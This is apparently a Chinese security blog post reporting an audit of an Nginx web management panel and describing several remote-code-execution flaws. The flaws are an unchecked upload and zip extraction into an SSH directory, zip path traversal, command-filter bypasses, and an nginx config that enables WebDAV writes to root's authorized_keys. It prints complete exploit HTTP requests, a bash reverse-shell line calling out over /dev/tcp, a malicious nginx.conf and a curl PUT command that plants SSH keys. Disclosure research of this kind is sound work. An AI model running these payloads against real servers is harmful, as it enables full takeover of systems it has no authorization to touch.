首发于https://xz.aliyun.com/t/14227
前言
半年前,审计过一次这套代码,那时候想着后台有命令执行的功能点,就没关注rce,审计了一些别的水洞。这次hookdd没事,说审计了一个rce,说一起看看,所以这次就只看rce,最后就有个以下几个洞。本次使用的3.9.8版本,但是刚刚更新了3.9.9,不过看描述,并没有修复一下几个点,应该都可以使用。(最新版依旧可用,nginx恶意配置看来是修不了了)
0x01 zip自解压
com.cym.controller.adminPage.MainController#upload
data:image/s3,"s3://crabby-images/cbcf3/cbcf3ebc958b0387453878b78aad4e952d86fea2" alt="image-20240329094943539"
功能比较简单,可以看见把tmpdir+’/‘+文件名拼接,然后保存进去,没有限制后缀,其实限制不限制都能r掉。
其中FileUtil.getTmpDir()会获取系统的临时目录,mac系统为
data:image/s3,"s3://crabby-images/1b7f4/1b7f49e50eefa0597f0d1034c79f904383646af2" alt="image-20240329095519164"
data:image/s3,"s3://crabby-images/cbf68/cbf68bdac31d830f3f3ebc0752ce1d65a70c310f" alt="image-20240329095527428"
ubuntu系统的临时目录为/tmp。
对应的前端功能点
data:image/s3,"s3://crabby-images/40cc3/40cc394ab7f042b9730dec6aa82ebe2e57d0b0b3" alt="image-20240329100106111"
前端这里是限制了zip上传,但是我们看后端是没有判断的,直接会把上传的文件放到临时目录。
data:image/s3,"s3://crabby-images/ecb62/ecb629acc1cc1d2072317bc3720bb6a6e631e170" alt="image-20240329100312049"
当我们选择好目录时,他会调用
com.cym.controller.adminPage.WwwController#addOver进行处理
data:image/s3,"s3://crabby-images/df7f5/df7f50237b2841a3c0d3086b57710f6ce92163e6" alt="image-20240329100458257"
可以看到,我们能控制解压目录,以及需要解压的文件,最后调用zip进行解压。
那么其实很简单了,TmpDir()我们知道,文件名知道,我们只需要上传一个ssh密钥到.ssh目录下就可以了。
复现
先选择要上传的zip文件
data:image/s3,"s3://crabby-images/84932/849326696fe01995587696621520c3d2ba0fafc2" alt="image-20240329100908051"
data:image/s3,"s3://crabby-images/56de8/56de82a96c9b955dad8438513f67c35231e9607f" alt="image-20240329101000205"
可以看到以及上传到tmp目录,这是macos的,ubutu在**/tmp**下
data:image/s3,"s3://crabby-images/d747c/d747ce7d07acb35d07a7ce34e713e377ea9c677d" alt="image-20240528154401727"
选择好ssh目录。
data:image/s3,"s3://crabby-images/c5bd7/c5bd759069b2cbf6ccc73591bfe6c2e600ec41a6" alt="image-20240329101451560"
对应数据包。
data:image/s3,"s3://crabby-images/fca41/fca414c1c0437a644ced0b1b681b2ba9fc447a62" alt="image-20240329101751292"
最后直接调用zip解压到ssh目录
data:image/s3,"s3://crabby-images/2560f/2560fc5efe8c45bf6c7ec0c64351f1e8914beb1f" alt="image-20240329101826366"
成功解压到ssh
data:image/s3,"s3://crabby-images/10b0b/10b0baa8dffe5f37def5351371dd1c0572961bff" alt="image-20240329102004582"
最后也是使用公钥直接登录
0x02 zip目录穿越
上面那种方法,其实只能打一次,因为在zip解压的时候会在数据库查询,钥匙已经同目录穿过,会抛出异常。
data:image/s3,"s3://crabby-images/d08aa/d08aa5e08f3f4ba204b71cfac0fd7e49ab75931d" alt="image-20240329103914323"
com.cym.controller.adminPage.WwwController#addOver
data:image/s3,"s3://crabby-images/8cf7a/8cf7abb5a6bb7713ff3f7a2c99c687ff8bdac001" alt="image-20240329104044288"
data:image/s3,"s3://crabby-images/d95d2/d95d249f7443ec728cf6b3344153d97aa9734c63" alt="image-20240329104055165"
data:image/s3,"s3://crabby-images/d18e9/d18e902001791b7eb04a5cc7713a48bada482cbe" alt="image-20240329104110206"
这里可以清楚得看到,会在sql里面查询上传目录是否存在,存在就抛出异常。
这里有两种解决办法,第一种就是data:image/s3,"s3://crabby-images/fd9fa/fd9fa265c6620466c24dcf31a58f66f7e057e990" alt="image-20240329104455283"
传入ssh的id,使其能正常修改目录的文件内容
data:image/s3,"s3://crabby-images/f16a8/f16a8dbd23e6ec474babd6b17490f78933779282" alt="image-20240329104820562"
id可以直接f12获得,
data:image/s3,"s3://crabby-images/1e5e7/1e5e789c743c0e4c9dd09987706cdca4444e80da" alt="image-20240329105024339"
填入后就可以正常穿
第二种就比较暴力
cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipFile, java.io.File, long)
data:image/s3,"s3://crabby-images/950f9/950f938c9e7191481b3e9c3f5358c7b28751a30d" alt="image-20240329105331535"
zipentry没有对../过滤。
zip解压时是没有对zip目录穿越进行过滤的,所以可以利用zip目录穿越来传文件,dir保证是没有使用过的就行。
复现
上传zip_slip.zipdata:image/s3,"s3://crabby-images/3fc33/3fc33ccaeae0b2de9b597a18f57df0bfcf100856" alt="image-20240329110204537"
data:image/s3,"s3://crabby-images/c7875/c787552a6d99349cf579c9914ea0b03d8cfcd3a1" alt="image-20240329110244552"
得到路径
data:image/s3,"s3://crabby-images/c01bc/c01bc76a48c604ce04451cbd4b499e0c3a084041" alt="image-20240329110338516"
上传时显示路径重复,这时我们dir任意写一个本地存在的目录,确保数据库没有就行。
data:image/s3,"s3://crabby-images/43980/43980e8361a191d273378f7ef07f90112c985e32" alt="image-20240329110739896"
最后成功上传。
data:image/s3,"s3://crabby-images/fb32c/fb32ca8e8780f0251edd2a2873d82f7bd06a07ba" alt="image-20240329110828441"
data:image/s3,"s3://crabby-images/57bcd/57bcd601c7f58acda710330b4fddf5a4b26ee0c3" alt="image-20240329110836847"
数据库里面的状态。
0x03 runcmd绕过造成命令执行
com.cym.controller.adminPage.ConfController#runCmd
data:image/s3,"s3://crabby-images/cc5ac/cc5ac52855e41f5babe56c1a1eae9bebc82d5c5d" alt="image-20240329155921247"
可以看到穿进来的cmd先进行过滤,在进行拼接执行。
com.cym.controller.adminPage.ConfController#isAvailableCmd
data:image/s3,"s3://crabby-images/01f29/01f292289c94f093bed0bc3ed6fe4c7d5b472f27" alt="image-20240329160038310"
data:image/s3,"s3://crabby-images/5f7b6/5f7b60fdfbdd9ae330cb0bd8c895ceae7427d001" alt="image-20240329160044572"
可以先读取nginxPath、nginxExe、nginxDir三个值,首先判断在不在case里面,不在就进入if,主要就是判断cmd和settingService.get(“nginxExe”) + “ -c “ + settingService.get(“nginxPath”) + dir是不是想等,不想等就不执行,想等就执行
com.cym.controller.adminPage.ConfController#saveCmd
data:image/s3,"s3://crabby-images/3f4a8/3f4a8e03e2fbc760370a078032c09abef98b18a6" alt="image-20240329160352345"
而刚好这三个值我们可自由控制。
data:image/s3,"s3://crabby-images/33ddb/33ddbdebb7b8b5a26289a9c820b3bb29c1be215c" alt="image-20240329160433191"
它会对传值进行过滤,其实看看很好绕过。linux用$(IFS)代替空格就行,win用powershell.exe(calc) 就行
复现
data:image/s3,"s3://crabby-images/562c5/562c5c6d1e769ae04f62887e7d2f38a0a806a673" alt="image-20240329161043497"
先修改两个值
data:image/s3,"s3://crabby-images/999de/999dec075870458dc8592650bded3ba3c5092899" alt="image-20240329161117706"
成功执行
data:image/s3,"s3://crabby-images/77238/772382d657883f1e50a15747bfd8b03746a96060" alt="image-20240329161155744"
data:image/s3,"s3://crabby-images/66ff9/66ff90f9f3a43428ec4dee313836e951479b3c26" alt="image-20240329161204639"
可以执行。
data:image/s3,"s3://crabby-images/e0013/e0013707ad50a3b9de819bb7415ad42a7e34d221" alt="image-20240329220127636"
由于有过滤,所以我们可以把reserveshell写进文件,在用bash来执行就好。
利用前面分析得,上传点自动缓存到tem目录,ubuntu为/tmp目录.。强烈建议不要用macos这傻逼每个shell环境里面var/folders/ln/sjz_zm513ng125ngw6c2b_lm0000gn都不一样。
data:image/s3,"s3://crabby-images/4f6e6/4f6e643d862153ac8298f316c9975647e9dcc3e7" alt="image-20240329223018517"
换ubuntu后,成功rce
data:image/s3,"s3://crabby-images/7e3e8/7e3e8e0be458c405d1ce6450d8915334bce38f41" alt="image-20240329223111645"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /adminPage/conf/saveCmd HTTP/1.1 Host: 192.168.108.137:8080 Content-Length: 55 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.108.137:8080 Referer: http://192.168.108.137:8080/adminPage/conf Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: SOLONID=2dc9dd75ef4242f4a74bc855799539ec Connection: close
nginxExe=bash&nginxDir=&nginxPath=$(bash${IFS}/tmp/111)
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| POST /adminPage/main/upload HTTP/1.1 Host: 192.168.108.137:8080 Content-Length: 231 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygQGA2ci4A6Ii4KAG Origin: http://192.168.108.137:8080 Referer: http://192.168.108.137:8080/adminPage/www Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: SOLONID=2dc9dd75ef4242f4a74bc855799539ec Connection: close
Content-Disposition: form-data; name="file"; filename="111" Content-Type: text/x-python-script
/bin/bash -i >& /dev/tcp/ip/9999 0>&1
|
0x04 reload 代码执行
com.cym.controller.adminPage.ConfController#reload
data:image/s3,"s3://crabby-images/ff7ba/ff7ba0b59a355397f8f61e86cc51d20ba00ce480" alt="image-20240330002357857"
没什么好说的,全可控,没有过滤。然后拼接,进行执行。
cn.hutool.core.util.RuntimeUtil#exec(java.lang.String…)
data:image/s3,"s3://crabby-images/a51f0/a51f0003a4fcc4b3b905dc36cfa2984bfe892408" alt="image-20240330002434052"
最后会调用到这里,和上面不同,这里是代码执行
复现
生成java格式代码执行
data:image/s3,"s3://crabby-images/0e392/0e392cd9595713536a0a287563982e181ccb270f" alt="image-20240330002657116"
data:image/s3,"s3://crabby-images/5f4ff/5f4fff266ccfaa9443864f5260a6ada220903467" alt="image-20240330002622189"
data:image/s3,"s3://crabby-images/69a7e/69a7eff109c00aa3cc175c9aecf5b51330464e03" alt="image-20240330002803528"
data:image/s3,"s3://crabby-images/bcb6e/bcb6e9828291fdb598bef94fd139f966d5a5a673" alt="image-20240330002630229"
成功获取shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /adminPage/conf/reload HTTP/1.1 Host: 192.168.108.137:8080 Content-Length: 131 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.108.137:8080 Referer: http://192.168.108.137:8080/adminPage/conf Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: SOLONID=2dc9dd75ef4242f4a74bc855799539ec Connection: close
nginxPath=&nginxExe=cmd&nginxDir=
|
0x05 check 代码执行
com.cym.controller.adminPage.ConfController#check
data:image/s3,"s3://crabby-images/7bc66/7bc667f5e85b8a7398fea8fc0a4f7e0eaf47b9b5" alt="image-20240330003342822"
同理,全可控,且没过滤
最后会走到execforstr(),然后造成代码执行
data:image/s3,"s3://crabby-images/80e30/80e300d533fa7793d4193fcf0137ffea1c27a4d4" alt="image-20240330003420470"
data:image/s3,"s3://crabby-images/43c3b/43c3bc7ab0cee13cf654abc3d6f44ebb273b28ac" alt="image-20240330003524958"
我们只需要对nginxExe赋值就行,json保持默认,其余不填即可
复现
data:image/s3,"s3://crabby-images/0e392/0e392cd9595713536a0a287563982e181ccb270f" alt="image-20240330002657116"
生成java反弹payload
data:image/s3,"s3://crabby-images/7eae0/7eae0745b018efb0aa341e20ad957c9e366d3d57" alt="image-20240330003729310"
成功rce
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /adminPage/conf/check HTTP/1.1 Host: 192.168.108.137:8080 Content-Length: 495 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.108.137:8080 Referer: http://192.168.108.137:8080/adminPage/conf Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: SOLONID=2dc9dd75ef4242f4a74bc855799539ec Connection: close
nginxPath=&nginxExe=bash+-c+cmd
|
0x06 利用nginx—conf配置rce
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| user root; worker_processes 4; pid /tmp/nginx.pid;
events { worker_connections 768; }
http { server { listen 1337; root /; autoindex on; location / { dav_methods PUT; } } }
|
data:image/s3,"s3://crabby-images/79196/7919612ccf4bfa68c9ea690e0289b2daa6bea49f" alt="image-20240417215333266"
1
| curl -X PUT -T ~/Downloads/authorized_keys http://192.168.108.137:1337/root/.ssh/authorized_keys
|
data:image/s3,"s3://crabby-images/e19ae/e19ae7fe0ff0353d92befacbb5f6aa065f9b1c04" alt="image-20240417215410337"
声明
此文章 仅用于教育目的。请负责任地使用它,并且仅在您有明确测试权限的系统上使用。滥用此 PoC 可能会导致严重后果。